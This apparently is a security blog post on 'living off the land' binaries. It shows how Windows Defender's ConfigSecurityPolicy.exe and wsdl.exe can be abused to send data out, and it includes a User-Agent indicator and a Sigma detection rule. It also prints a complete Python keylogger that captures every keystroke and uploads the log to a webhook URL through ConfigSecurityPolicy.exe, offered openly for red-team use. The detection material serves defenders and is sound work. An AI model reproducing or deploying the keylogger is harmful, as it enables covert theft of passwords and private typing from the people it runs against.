Image for post
Image for post

Data Exfiltration with LOLBins

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can check a lof of tricks on “https://github.com/LOLBAS-Project/LOLBAS” — Living Off The Land Binaries And Scripts — (LOLBins and LOLScripts).

My first discover was a simple way to abuse Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9–0\ConfigSecurityPolicy.exe”] to exfil data:

Image for post
Image for post
ConfigSecurityPolicy.exe

Looking for a little more, I found another way with wsdl.exe (Microsoft Web Services Description Language Utility), The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which enables you to generate a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:

Image for post
Image for post
wsdl.exe

Blueteam/Redteam tips:

  • UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
  • A simple sigma rule to help possible insider threat:
logsource:
product: windows
category: process_creation
detection
selection:
Image: '*\ConfigSecurityPolicy.exe'
mandatory_cmdline:
Commandline|all:
- '*ConfigSecurityPolicy.exe*'
- '*.xml'
condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins

A piece of code to help readteam usage(thanks Neriberto Prado ❤), a simple keylogger abusing Windows Defender to exfil logs:

# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)
print(f'last key: {str(key)}')
print("")
if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''
if key == 0x03:
sys.exit(0)
if __name__ == "__main__":
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
Image for post
Image for post
Proof of Concept

MITRE ATT&CK Techniques:

  • ID: T1105
  • Sub-techniques: No sub-techniques
  • Tactic: Command And Control
  • Platforms: Linux, Windows, macOS
  • Permissions Required: User
  • Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, a simple and effective way to simulate possible tactics of your opponents, soon I will come back with more tips.

Image for post
Image for post

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store